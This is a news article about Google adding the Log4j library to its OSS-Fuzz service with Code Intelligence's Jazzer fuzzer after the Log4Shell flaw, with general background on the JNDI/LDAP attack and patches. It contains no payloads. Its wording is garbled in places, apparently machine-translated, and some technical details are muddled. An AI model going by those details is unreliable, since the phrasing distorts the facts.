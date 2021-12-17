



A remote exploitable flaw in Log4j is that the widely deployed Java error log library is being attacked by multiple actors, patching open source projects, product vendors, and end-user organizations to affected systems. , May continue for the next few months.

Google is currently adding OSS-Fuzz to its pool of answers to Log4j flaws (also known as Log4Shell) across the Internet. This bug has been tracked as CVE2021-44228 and has been partially fixed in the release of Log4j version 2.15.0 of the Apache Foundation last week.

OSS-Fuzz is Google’s free service for fuzzing open source software projects and is currently used in over 500 critical projects. Fuzzing throws random code into the software, generating errors such as crashes and revealing potential security flaws.

LOG4JFLAW Coverage-What You Need to Know Now

To look for weaknesses in the newly built open source software Log4Shell, Google has partnered with security company Code Intelligence to provide Log4j with continuous fuzzing.

Code Intelligence created Jazzer, an open source fuzzing engine that is now part of OSS-Fuzz, and modified it to identify a vulnerability in Log4j in the code under development. Google has awarded Code Intelligence $ 25,000 for its Log4j fuzzing efforts.

“Because Jazzer is part of OSS-Fuzz, similar vulnerabilities are continuously being searched for in all integrated open source projects written in Java and other JVM-based languages,” Code Intelligence said. It is stated in the press release.

Jazzer can also detect remote JNDI lookups, which is a powerful sign that a potential attacker can scan your network for flaws.

JNDI (Java Naming and Directory Interface) is an interface for connecting to directories on a Lightweight Directory Access Protocol (LDAP) server, and a flaw in Log4j lies in the JNDI implementation.

As described by Cisco Talos researchers, this flaw allows a remote attacker to use a simple LDAP request to trigger a vulnerability in a version of Log4j prior to 2.15, and the payload from the remote server. Can be obtained and run locally on vulnerable devices.

The Apache Foundation released Log4j version 2.16.0 this week to fix a second related flaw due to JNDI being tracked as CVE2021-45046. This flaw allowed an attacker to create a data pattern with JNDI message lookup and neutralize the machine with a denial of service (DoS).

Log4j 2.16.0 disables access to JNDI by default and limits the default protocol to Java, LDAP, and LDAPS. Disabling JNDI was previously a manual procedure to mitigate attacks on the original flaw.

Currently, most efforts are focused on vendors updating Log4j for their products and end-user organizations that apply updates when they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) is providing federal agencies until December 24 to identify all applications affected by Log4Shell. Cisco, VMware, IBM, and Oracle are busy developing patches for affected products.

LOG4JFLAW Coverage-How to Keep Your Company Safe

Google’s OSS-Fuzz aims to tackle Log4j from a different angle and prevent developers from accidentally injecting flaws in new software projects that may eventually be deployed in production. ..

“Vulnerabilities like Log4Shell are stunning to the industry in terms of new attack vectors. OSS-Fuzz and Jazzer allow us to detect this class of vulnerabilities, which is a problem in production code. It can now be fixed before, “says Jonathan Metzman of the Google Open Source Security Team.

